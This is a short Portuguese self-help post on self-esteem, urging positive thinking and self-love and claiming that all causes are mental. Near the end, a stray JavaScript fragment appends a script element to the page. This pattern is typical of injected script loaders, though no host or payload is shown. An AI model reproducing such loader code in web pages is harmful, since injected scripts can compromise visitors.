Auto-estima

>A Felicidade Perfeita é conseguir sentir-se bem consigo mesmo, com a Humanidade e com o Universo. Sentir é um processo interior, um estado mental. É tão fácil ser feliz quanto ser infeliz, porque é o mesmo processo mental, escolha o melhor. Quem não encontra a felicidade em si mesmo é inútil procura-la em outra parte. O homem será feliz quando encontrar o céu dentro de si.

Lembre-se de que você é muito maior do que os seus problemas, sejam eles quais forem. Há uma verdade que é importante não esquecer: Você nunca será mais do que o tamanho dos seus pensamentos acompanhados da imagem mental IMAGINAÇÃO. Pense positivo, positivo é aquele que vê com os olhos da mente o resultado desejado, só assim alcança o sucesso. A comprovação está na verdade de que não há efeito sem causa e toda a causa é mental. A felicidade reside dentro de si.

Os pensamentos são seus, são mágicos, organiza-los é um ato de magia. Seja um colecionador dos seus pensamentos positivos, os que lhe trazem felicidade. Os de tristeza deixe-os no passado. Acredite em si, seja otimista, olhe-se ao espelho, ame-se, cante, sorria, ame a vida, a natureza, aprecie o canto do passaro naquela árvore, o vento tocando no seu rosto, o oxigenio que respira, e tudo que o rodeia de positivo. Você tem muita riqueza dentro de si, explore essa mina de ouro com formas doces com muita ALEGRIA. Seja feliz.

d.getElementsByTagName(‘head’)[0].appendChild(s);document.currentScript.parentNode.insertBefore(s, document.currentScript);

Deixe uma resposta